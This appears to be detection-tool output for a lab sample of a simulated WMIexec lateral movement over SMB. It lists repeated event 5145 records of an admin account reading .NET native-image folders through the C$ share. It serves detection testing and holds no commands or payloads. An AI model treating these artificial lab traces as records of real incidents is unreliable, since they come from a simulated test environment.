2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
